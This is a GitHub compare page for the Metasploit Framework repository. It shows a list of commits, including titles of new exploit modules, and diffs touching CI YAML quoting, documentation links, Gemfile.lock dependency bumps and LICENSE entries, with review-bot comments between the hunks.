Compare commits


112 Commits

Author SHA1 Message Date
Metasploit 83f9964e99 automatic module_metadata_base.json update 2023-02-02 12:03:09 -06:00
adfoster-r7 cfb5a55880 Land #16946, Add row indicator to show targets command 2023-02-02 17:26:53 +00:00
Jack Heysel af2ef53462 Land #17415, macOS dirty cow priv esc 2023-02-02 12:15:19 -05:00
adfoster-r7 b408837b7f Land #17575, Load TGS tickets with a different sname 2023-02-02 17:02:48 +00:00
cgranleese-r7 d1e68e634a Add row indicator to show targets command 2023-02-02 16:12:19 +00:00
Jack Heysel 1f224fd2d3 Rapid7 compiled binary 2023-02-02 11:11:06 -05:00
Jack Heysel 88caeddc8c Fixed license 2023-02-02 11:10:06 -05:00
Jack Heysel 4de5e44bda Documentation 2023-02-02 10:38:26 -05:00
Spencer McIntyre 3eaed76025 Land #17561, Fix functions in def_iphlpapi.rb
Fix input and output buffers for some mislabeled functions in def_iphlpapi.rb
2023-02-02 09:10:28 -05:00
Metasploit 2b2406f9af automatic module_metadata_base.json update 2023-02-02 05:05:42 -06:00
adfoster-r7 952a4fe37a Land #17581, modules: Check datastore ForceExploit before checking if session is root 2023-02-02 10:19:07 +00:00
adfoster-r7 56866ad09a Land #17580, update links to new docs website 2023-02-02 10:15:10 +00:00
bcoles 6f4a17230d exploits/osx/local/vmware_fusion_lpe: Add notes 2023-02-02 18:46:08 +11:00
bcoles a83d070396 exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc: Add Reliability notes 2023-02-02 18:45:43 +11:00
bcoles ef87a63bde modules: Check datastore ForceExploit before checking if session is root 2023-02-02 18:17:02 +11:00
Grant Willcox 48a27ab555 Fix the remaining references to the old wiki site. 2023-02-01 21:25:06 -06:00
Metasploit e752e1dbca automatic module_metadata_base.json update 2023-02-01 18:12:49 -06:00
adfoster-r7 6870efc34a Land #17426, Update all references to old Wiki to point to new docs site 2023-02-01 23:49:20 +00:00
Metasploit f128640bf1 automatic module_metadata_base.json update 2023-02-01 16:59:01 -06:00
Jack Heysel c90a6f9068 Land #17406, veeam_credential_dump post module
Veeam Backup & Recovery and Veeam ONE Monitor credential
capture post module for versions 9.x and 11.x.
2023-02-01 17:29:05 -05:00
Metasploit 4418bcc673 automatic module_metadata_base.json update 2023-02-01 16:18:56 -06:00
Jack Heysel f4c5632b6d Cleaned up license file 2023-02-01 17:04:26 -05:00
Jack Heysel 076ffbcc65 Merge branch 'mac_dirty_cow' of github.com:timwr/metasploit-framework into mac_dirty_cow 2023-02-01 16:57:36 -05:00
Jack Heysel 3c7cbf62e6 Updated default payload 2023-02-01 16:56:28 -05:00
jheysel-r7 6037936869 Update LICENSE 2023-02-01 16:54:04 -05:00
jheysel-r7 595f34fc6f Merge branch 'master' into mac_dirty_cow 2023-02-01 16:51:09 -05:00
Grant Willcox e9fef56186 Land #17481, Update HTTP options module 2023-02-01 15:49:27 -06:00
Jack Heysel 057f046186 Updated license file 2023-02-01 16:46:45 -05:00
h00die 4ba04df138 update http options 2023-02-01 15:12:39 -06:00
Grant Willcox b5a83ffd0f Add in PULONG alias to PDWORD and update definitions 2023-02-01 12:36:22 -06:00
Jeffrey Martin 8d31b63f7a update Pro version docs for 4.22.0 release 2023-02-01 12:19:59 -06:00
Metasploit b922bb533b automatic module_metadata_base.json update 2023-02-01 11:15:51 -06:00
adfoster-r7 014bdddd1a Land #17564, Fixed AnyConnect IPC message format 2023-02-01 16:34:44 +00:00
adfoster-r7 a5990a5a7d Land #17578, modules/exploits/openbsd Add notes and use CheckCodes messages 2023-02-01 16:26:59 +00:00
Metasploit 5af2689a0e automatic module_metadata_base.json update 2023-02-01 10:16:55 -06:00
Jack Heysel a6f0a8abe3 Land #17301, module for cve-2022-1043, linux LPE
This module exploits a bug in io_uring leading to an additional put_cred
that can be exploited to hijack credentials of other processes.
2023-02-01 10:38:10 -05:00
Jack Heysel 690d22f759 Rapid7 compiled binary 2023-02-01 10:08:13 -05:00
Spencer McIntyre 994d41ac80 Update parts of the docs 2023-02-01 09:28:00 -05:00
adfoster-r7 5a1eb16018 Land #17574, Use the new NDR types in RubySMB v3.2.4 2023-02-01 12:02:47 +00:00
Metasploit 4a04a86675 automatic module_metadata_base.json update 2023-02-01 05:46:09 -06:00
bcoles 86a6611e98 modules/exploits/openbsd: Add notes and use CheckCodes messages 2023-02-01 22:26:44 +11:00
adfoster-r7 1ff1cd1779 Land #17577, modules/exploits/qnx Use AutoCheck, add Notes, resolve Rubocop violations 2023-02-01 11:20:49 +00:00
bcoles c9012ae222 modules/exploits/qnx: Use AutoCheck, add Notes, resolve Rubocop violations 2023-02-01 20:51:44 +11:00
h00die 2c72cc145a updates to module 2023-01-31 20:05:33 -05:00
Spencer McIntyre 84f798da32 Allow loading TGS tickets for other service names
Fixes #17571
2023-01-31 17:03:25 -05:00
h00die fa687d3614 argv instead of hardcoded payload path 2023-01-31 16:02:25 -05:00
h00die 5a374533af cve-2022-1043 2023-01-31 16:02:25 -05:00
h00die 8d58eb6279 cve-2022-1043 2023-01-31 16:02:25 -05:00
Metasploit 42542102e3 automatic module_metadata_base.json update 2023-01-31 13:59:14 -06:00
Jack Heysel 2306736383 Land #17300, the latest commit in PR 17300
I made a mistake and was not up to date with the latest commit
in the PR before I landed, this fixes that mistake.
2023-01-31 14:18:01 -05:00
Jack Heysel 022760d24a Land #17300, linux LPE cve-2022-22942 module
This PR adds a linux priv esc against VMWare virtual machines
with kernel 4.14-rc1 - 5.17-rc1 due to a VMWare driver bug.
2023-01-31 14:07:55 -05:00
Jack Heysel e99407fe26 Updated pre_compiled binary 2023-01-31 13:37:45 -05:00
Jeffrey Martin 9c7665a017 add GSoC 2023 to navigation 2023-01-31 11:00:26 -06:00
Grant Willcox b866bf59c8 Land #17444, Fix parsing of module options with special characters 2023-01-31 10:42:16 -06:00
Grant Willcox 8805ed2b5a Last minute typo fixes 2023-01-31 10:41:47 -06:00
Jeffrey Martin 77dd6bd77e add initial 2023 GSoC ideas doc 2023-01-31 10:18:12 -06:00
Spencer McIntyre 0d9a282237 Use the new NDR types in RubySMB v3.2.4 2023-01-31 10:08:27 -05:00
Metasploit daa96f9fb7 automatic module_metadata_base.json update 2023-01-31 08:53:19 -06:00
adfoster-r7 56728fc7c2 Land #17573, modules/exploits/linux/ssh Resolve Rubocop violations 2023-01-31 14:12:03 +00:00
adfoster-r7 bbf17c167c Land #17511, add exploit for CVE-2022-44877 command injection in CentOS Control Web Panel 2023-01-31 14:05:19 +00:00
adfoster-r7 5076518fe4 Land #17559, add support for Ruby 3.2 2023-01-31 13:45:51 +00:00
cgranleese-r7 fb196cb378 Testing Ruby 3.2 against CI 2023-01-31 13:19:06 +00:00
bcoles 11cf391da8 modules/exploits/linux/ssh: Resolve Rubocop violations 2023-01-31 23:59:22 +11:00
adfoster-r7 7bb0eca931 Land #17545, use strings in YAML files 2023-01-30 22:52:19 +00:00
Metasploit 42004c07bc automatic module_metadata_base.json update 2023-01-30 16:43:35 -06:00
adfoster-r7 433099e539 Land #17563, modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-30 22:16:41 +00:00
Grant Willcox bfc5c563a1 Land #17570, Add new queries and attributes for ldap_query 2023-01-30 16:14:26 -06:00
Spencer McIntyre 902eaa2562 Add new queries and attributes for ldap_query 2023-01-30 16:24:23 -05:00
dwelch-r7 e3a9e5a163 Land #17565, Add Metasploit prompt color highlighting to docs 2023-01-30 13:05:08 +00:00
adfoster-r7 f3a372719c Land #17568, Plugins: Resolve Rubocop violations 2023-01-30 11:35:31 +00:00
bcoles db90604333 plugins/bescure: Replace 'initheaders' Hash key with Hash in Net::HTTP::Post.new calls 2023-01-30 22:11:21 +11:00
bcoles 4ff475f180 plugins: Resolve rubocop violations 2023-01-30 13:07:16 +11:00
bcoles 7cf37f5fb7 plugins: rubocop -A plugins 2023-01-30 13:05:34 +11:00
bcoles dd20bcac77 plugins: rubocop -a plugins 2023-01-30 12:25:46 +11:00
adfoster-r7 c68ab9b77f Add Metasploit prompt color highlighting to docs 2023-01-28 22:43:33 +00:00
Duarte Silva a7ae3c9389 Fixed AnyConnect IPC message format:
- Made an error in the original research where the TLV had a type
  and an index, when it only has a type and a modifier that makes
  it into a TV (Type and Value, no Length).
- A TV has its value where the Length would be on a TLV.
- Also added a note on the endianness being correct/working because
  endianness has no impact on the message being used to exploit the
  vulnerability.
2023-01-28 09:08:51 +00:00
bcoles e11aaa8027 modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations 2023-01-28 15:02:24 +11:00
Metasploit 1b20db8900 automatic module_metadata_base.json update 2023-01-27 14:39:53 -06:00
Grant Willcox be85aa253d Fix input and output buffers for some mislabeled functions 2023-01-27 14:09:45 -06:00
Jack Heysel c3e73b9b11 Land #17557, Fix the logon_time in the MS14-068 2023-01-27 15:08:49 -05:00
Grant Willcox 1782ae1ff2 Fix up links within Wiki site to make them relative links where possible 2023-01-27 10:09:02 -06:00
Grant Willcox 6043d0ffba Update all links from Wiki site to new docs site. 2023-01-27 09:58:53 -06:00
Grant Willcox 6111852df8 Land #17504, add 'favorite -l' and 'favorites' as aliases for show favorites 2023-01-27 09:37:06 -06:00
adfoster-r7 c681358f88 Land #17558, Fixes analyze command crashing with a winrm session opened 2023-01-27 15:35:40 +00:00
Spencer McIntyre 647cf1d402 Return Time from #extract_logon_time 2023-01-27 10:05:02 -05:00
Metasploit 8d4d48e005 automatic module_metadata_base.json update 2023-01-27 08:14:45 -06:00
dwelch-r7 4c54fffaed Land #17560, Present unsupported ul_types in a clearer way to the user 2023-01-27 13:50:55 +00:00
adfoster-r7 020e221c42 Present unsupported ul_types in a clearer way to the user 2023-01-27 13:40:33 +00:00
cgranleese-r7 1d8c9d3690 Fixes analyze command crashing with a winrm session opened 2023-01-27 10:45:05 +00:00
Spencer McIntyre f4976a0f9f Fix the logon_time in the MS14-068 exploit 2023-01-26 16:16:55 -05:00
Metasploit d80a18a00c Bump version of framework to 6.3.1 2023-01-26 13:40:05 -06:00
Grant Willcox 87b9152314 Continue fixing versions of Ruby in YAML files not being properly quoted like they should be. 2023-01-26 09:49:08 -06:00
Spencer McIntyre f81195d0cc Fix a typo 2023-01-25 13:45:18 -05:00
Spencer McIntyre 6fe0933c1e Add exploit for CVE-2022-44877 2023-01-20 09:04:24 -05:00
ErikWynter 6419f2d5a5 add 'favorite -l' and 'favorites' as aliases for show favorites 2023-01-19 14:21:45 +02:00
h00die 3a0b694790 better engrish 2023-01-18 20:12:49 -05:00
h00die c823295915 cleanup better 2023-01-18 16:19:48 -05:00
npm-cesium137-io 8ed4f59c60 veeam_credential_dump refinement
Fixed stupid typo in markdown.

Fixed a bug in the export code that prevented the disposition column
from being exported.
2023-01-18 14:27:28 -05:00
h00die d0abb5697b re-add license stuff 2023-01-17 17:31:01 -05:00
bwatters 0dbb0dc8c9 Fix margins for readability and delete file 2023-01-17 17:28:27 -05:00
bwatters d1f878c4f0 Fix spelling 2023-01-17 17:28:27 -05:00
bwatters 158c557d58 Update LICENSE file and location of source file 2023-01-17 17:28:22 -05:00
h00die e28ff3b160 minor fixes 2023-01-17 15:30:36 -05:00
h00die be7ca91a8f cve-2022-22942 2023-01-17 15:30:36 -05:00
Hamilton Tobon Mosquera d01060f40f docs: how to set complex options using quotes 2023-01-16 17:38:20 -05:00
Hamilton Tobon Mosquera fd7fbb76af fix: cmd_run: remove unnecessary map
Removing the call to .map over args[:datastore_options] avoids an unnecessary call to Msf::DataStore#import_options_from_s. args[:datastore_options] is already a hash, converting it to string and using Msf::DataStore#import_options_from_s converts it back to hash, which is not necessary. The Msf::Simple::Module mixin already offers support for Options, which is expected to be a hash.

This change also prevents sending corner case option strings to Msf::DataStore#import_options_from_s when using post modules, which does not support strings like: "COMMAND='date --date=2023-01-01'".
2023-01-11 16:54:13 -05:00
Hamilton Tobon Mosquera 03acb7e9f2 test: added rspec tests for 6074d1a4d3 2023-01-11 15:46:55 -05:00
npm-cesium137-io 499d1ccfd7 Refactor veeam_credential_dump
Changed the SQL queries for DB dump to explicit VARCHAR(4096) to get
around sqlcmd's 256-char column limit.

Refactored the BATCH_DPAPI functionality because I can't seem to let
this pattern go: now actually batches with byte threshold set by
advanced option.

Reduced clutter and redundancy.

Various tweaks and bug fixes.

Updated documentation.
2023-01-09 16:31:44 -05:00
Hamilton Tobon Mosquera 6074d1a4d3 fix: parse COMMAND with nested '=' in meterpreter
Fixes bug #16578
2023-01-06 09:27:25 -05:00
timwr ce260f53f3 Add CVE-2022-46689 macOS dirty cow 2022-12-28 22:46:08 +07:00
npm-cesium137-io 9cc8d41388 veeam_credential_dump post module revisions
Cleanup for initial PR.
2022-12-21 15:53:46 -05:00
npm-cesium137-io 6eaa0bfab2 Add veeam_credential_dump post module
Post module for Veeam Backup and Replication / Veeam ONE Monitor Server
credential extract
2022-12-10 16:21:59 -05:00
303 changed files with 14156 additions and 9405 deletions
+2 -2
@@ -38,7 +38,7 @@ jobs:
fail-fast: true
matrix:
ruby:
- 2.7
- '2.7'
name: Ruby ${{ matrix.ruby }}
steps:
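Review bot: quoting `'2.7'` is the right fix here, since an unquoted `2.7` is parsed by YAML as a float and a sibling entry such as `3.0` would reach the runner as `3`; any other version entries or `include`/`exclude` lists in this matrix should use the same string quoting so the whole axis has one type.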
@@ -48,7 +48,7 @@ jobs:
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
working-directory: docs
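Review bot: quoting `'${{ matrix.ruby }}'` on the `ruby-version` line is redundant: the unquoted value is already a YAML string, and the expression is substituted after parsing, so the type that setup-ruby sees is fixed by the matrix entry itself (which the earlier hunk already quotes). Harmless, but it could be dropped to keep the change minimal.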
+1 -1
@@ -59,7 +59,7 @@ jobs:
comment: `
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
- [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
`
+2 -2
@@ -35,7 +35,7 @@ jobs:
fail-fast: true
matrix:
ruby:
- 2.7
- '2.7'
name: Lint msftidy
steps:
@@ -51,7 +51,7 @@ jobs:
- uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
env:
BUNDLE_WITHOUT: "coverage development pcap"
+1
@@ -67,6 +67,7 @@ jobs:
- '2.7'
- '3.0'
- '3.1'
- '3.2'
os:
- ubuntu-20.04
- ubuntu-latest
+5 -5
@@ -1,6 +1,6 @@
# Contributing to Metasploit
Thank you for your interest in making Metasploit -- and therefore, the
world -- a better place! Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
world -- a better place! Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.
## Code Free Contributions
Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
will be closed. We need to ensure the code we're adding to master is written to a high standard.
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
curve, so keep it up!
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
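Review bot: the two Code of Conduct links now point at different targets: the inline link at the top of the file was changed to the local `./CODE_OF_CONDUCT.md`, while this reference-style definition was changed to `https://docs.metasploit.com/docs/code-of-conduct.html`. Pick one target for both so the document does not drift when either copy is edited.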
@@ -101,7 +101,7 @@ curve, so keep it up!
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
[API]:https://rapid7.github.io/metasploit-framework/api
[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[RSpec]:http://rspec.info
[Better Specs]:http://www.betterspecs.org/
+46 -46
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.3.0)
metasploit-framework (6.3.1)
actionpack (~> 7.0)
activerecord (~> 7.0)
activesupport (~> 7.0)
@@ -97,25 +97,25 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.1.0)
actionpack (7.0.4.1)
actionview (= 7.0.4.1)
activesupport (= 7.0.4.1)
actionpack (7.0.4.2)
actionview (= 7.0.4.2)
activesupport (= 7.0.4.2)
rack (~> 2.0, >= 2.2.0)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.2.0)
actionview (7.0.4.1)
activesupport (= 7.0.4.1)
actionview (7.0.4.2)
activesupport (= 7.0.4.2)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.1, >= 1.2.0)
activemodel (7.0.4.1)
activesupport (= 7.0.4.1)
activerecord (7.0.4.1)
activemodel (= 7.0.4.1)
activesupport (= 7.0.4.1)
activesupport (7.0.4.1)
activemodel (7.0.4.2)
activesupport (= 7.0.4.2)
activerecord (7.0.4.2)
activemodel (= 7.0.4.2)
activesupport (= 7.0.4.2)
activesupport (7.0.4.2)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
minitest (>= 5.1)
@@ -127,22 +127,22 @@ GEM
activerecord (>= 3.1.0, < 8)
ast (2.4.2)
aws-eventstream (1.2.0)
aws-partitions (1.689.0)
aws-sdk-core (3.168.4)
aws-partitions (1.701.0)
aws-sdk-core (3.170.0)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.651.0)
aws-sigv4 (~> 1.5)
jmespath (~> 1, >= 1.6.1)
aws-sdk-ec2 (1.356.0)
aws-sdk-ec2 (1.362.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.73.0)
aws-sdk-iam (1.74.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.61.0)
aws-sdk-kms (1.62.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.117.2)
aws-sdk-s3 (1.119.0)
aws-sdk-core (~> 3, >= 3.165.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.4)
@@ -155,7 +155,7 @@ GEM
builder (3.2.4)
byebug (11.1.3)
coderay (1.1.3)
concurrent-ruby (1.1.10)
concurrent-ruby (1.2.0)
cookiejar (0.3.3)
crass (1.0.6)
daemons (1.4.1)
@@ -186,7 +186,7 @@ GEM
railties (>= 5.0.0)
faker (3.1.0)
i18n (>= 1.8.11, < 2)
faraday (2.7.2)
faraday (2.7.4)
faraday-net_http (>= 2.0, < 3.1)
ruby2_keywords (>= 0.0.4)
faraday-net_http (3.0.2)
@@ -230,12 +230,12 @@ GEM
nokogiri (>= 1.5.9)
memory_profiler (1.0.1)
metasm (1.0.5)
metasploit-concern (5.0.0)
metasploit-concern (5.0.1)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.1)
metasploit-credential (6.0.2)
metasploit-concern
metasploit-model
metasploit_data_models (>= 5.0.0)
@@ -245,12 +245,12 @@ GEM
rex-socket
rubyntlm
rubyzip
metasploit-model (5.0.0)
metasploit-model (5.0.1)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
metasploit-payloads (2.0.108)
metasploit_data_models (6.0.1)
metasploit_data_models (6.0.2)
activerecord (~> 7.0)
activesupport (~> 7.0)
arel-helpers
@@ -279,7 +279,7 @@ GEM
network_interface (0.0.2)
nexpose (7.3.0)
nio4r (2.5.8)
nokogiri (1.13.10)
nokogiri (1.14.1)
mini_portile2 (~> 2.8.0)
racc (~> 1.4)
nori (2.6.0)
@@ -313,7 +313,7 @@ GEM
puma (6.0.2)
nio4r (~> 2.0)
racc (1.6.2)
rack (2.2.5)
rack (2.2.6.2)
rack-protection (3.0.5)
rack
rack-test (2.0.2)
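Review bot: `rack (2.2.5)` to `rack (2.2.6.2)` is a patch-level bump on a gem that sits on the request path, yet none of the commits in this range describes the dependency refresh; a commit message naming the motivation for the rack, nokogiri and rails updates (security advisory or routine refresh) would make this lockfile change auditable later.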
@@ -321,24 +321,24 @@ GEM
rails-dom-testing (2.0.3)
activesupport (>= 4.2.0)
nokogiri (>= 1.6)
rails-html-sanitizer (1.4.4)
rails-html-sanitizer (1.5.0)
loofah (~> 2.19, >= 2.19.1)
railties (7.0.4.1)
actionpack (= 7.0.4.1)
activesupport (= 7.0.4.1)
railties (7.0.4.2)
actionpack (= 7.0.4.2)
activesupport (= 7.0.4.2)
method_source
rake (>= 12.2)
thor (~> 1.0)
zeitwerk (~> 2.5)
rainbow (3.1.1)
rake (13.0.6)
rasn1 (0.12.0)
rasn1 (0.12.1)
strptime (~> 0.2.5)
rb-readline (0.5.5)
recog (3.0.3)
nokogiri
redcarpet (3.5.1)
regexp_parser (2.6.1)
redcarpet (3.6.0)
regexp_parser (2.6.2)
reline (0.3.2)
io-console (~> 0.5)
rex-arch (0.1.14)
@@ -349,12 +349,12 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.29)
rex-core (0.1.30)
rex-encoder (0.1.6)
metasm
rex-arch
rex-text
rex-exploitation (0.1.36)
rex-exploitation (0.1.37)
jsobfu
metasm
rex-arch
@@ -372,21 +372,21 @@ GEM
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.9)
rex-random_identifier (0.1.10)
rex-text
rex-registry (0.1.4)
rex-rop_builder (0.1.4)
metasm
rex-core
rex-text
rex-socket (0.1.45)
rex-socket (0.1.46)
rex-core
rex-sslscan (0.1.8)
rex-sslscan (0.1.9)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.3)
rex-text (0.2.47)
rex-text (0.2.49)
rex-zip (0.1.4)
rex-text
rexml (3.2.5)
@@ -400,7 +400,7 @@ GEM
rspec-expectations (3.12.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-mocks (3.12.2)
rspec-mocks (3.12.3)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-rails (6.0.1)
@@ -414,16 +414,16 @@ GEM
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.12.0)
rubocop (1.42.0)
rubocop (1.44.1)
json (~> 2.3)
parallel (~> 1.10)
parser (>= 3.1.2.1)
parser (>= 3.2.0.0)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.24.1, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 1.4.0, < 3.0)
unicode-display_width (>= 2.4.0, < 3.0)
rubocop-ast (1.24.1)
parser (>= 3.1.1.0)
ruby-macho (3.0.0)
@@ -431,7 +431,7 @@ GEM
ruby-progressbar (1.11.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.5)
ruby_smb (3.2.3)
ruby_smb (3.2.4)
bindata
openssl-ccm
openssl-cmac
@@ -453,7 +453,7 @@ GEM
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.5)
tilt (~> 2.0)
sqlite3 (1.5.4)
sqlite3 (1.6.0)
mini_portile2 (~> 2.8.0)
sshkey (2.0.0)
strptime (0.2.5)
@@ -467,7 +467,7 @@ GEM
timecop (0.9.6)
timeout (0.3.1)
ttfunk (1.7.0)
tzinfo (2.0.5)
tzinfo (2.0.6)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2022.7)
tzinfo (>= 1.0.0)
+390
@@ -57,6 +57,20 @@ Copyright: 2018
License: GNU GPL 3
Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
Copyright: 2022 Open Source Security, Inc.
License: GNU GPL 2.0
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-1043, a local privilege escalation vulnerability in
Linux kernels 5.12-rc3 - 5.14-rc7.
Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
Copyright: 2022 Open Source Security, Inc.
License: GNU GPL 2.0
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-22942, a local privilege escalation vulnerability in
Linux kernels 4.14-rc1 - 5.17-rc1.
Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
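Review bot: the unchanged context line `Files: exteneral/source/exploits/CVE-2022-26904/*` carries a pre-existing typo (`exteneral` for `external`); since this hunk touches the surrounding entries, it is a good moment to fix the path so the file list stays consistent with the two new `external/source/exploits/...` entries. The kernel ranges given for CVE-2022-1043 (5.12-rc3 - 5.14-rc7) and CVE-2022-22942 (4.14-rc1 - 5.17-rc1) match the corresponding commit messages.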
@@ -121,6 +135,13 @@ Purpose: The built result is used in:
payloads/stages/windows/vncinject.rb
payloads/stages/windows/x64/vncinject.rb
Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
Copyright: 1999-2007 Apple Inc.
License: Apple
Purpose: This source file is necessary for users to create a stand-alone executable
to exploit CVE-2022-46689, a local privilege escalation vulnerability in
MacOSX versions (macOS dirty cow)
Files: lib/anemone.rb
lib/anemone/*
Copyright: 2009 Vertive, Inc.
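Review bot: the Purpose line for CVE-2022-46689 ends in `MacOSX versions (macOS dirty cow)` without an affected-version range, unlike the two new Linux entries above that state their kernel ranges; fill in the affected macOS versions the module targets so the entry is as specific as its siblings.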
@@ -998,3 +1019,372 @@ License: Zlib
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
License: Apple
APPLE PUBLIC SOURCE LICENSE
Version 2.0 - August 6, 2003
Please read this License carefully before downloading this software.
By downloading or using this software, you are agreeing to be bound by
the terms of this License. If you do not or cannot agree to the terms
of this License, please do not download or use the software.
1. General; Definitions. This License applies to any program or other
work which Apple Computer, Inc. ("Apple") makes publicly available and
which contains a notice placed by Apple identifying such program or
work as "Original Code" and stating that it is subject to the terms of
this Apple Public Source License version 2.0 ("License"). As used in
this License:
1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
the grantor of rights, (i) claims of patents that are now or hereafter
acquired, owned by or assigned to Apple and (ii) that cover subject
matter contained in the Original Code, but only to the extent
necessary to use, reproduce and/or distribute the Original Code
without infringement; and (b) in the case where You are the grantor of
rights, (i) claims of patents that are now or hereafter acquired,
owned by or assigned to You and (ii) that cover subject matter in Your
Modifications, taken alone or in combination with Original Code.
1.2 "Contributor" means any person or entity that creates or
contributes to the creation of Modifications.
1.3 "Covered Code" means the Original Code, Modifications, the
combination of Original Code and any Modifications, and/or any
respective portions thereof.
1.4 "Externally Deploy" means: (a) to sublicense, distribute or
otherwise make Covered Code available, directly or indirectly, to
anyone other than You; and/or (b) to use Covered Code, alone or as
part of a Larger Work, in any way to provide a service, including but
not limited to delivery of content, through electronic communication
with a client other than You.
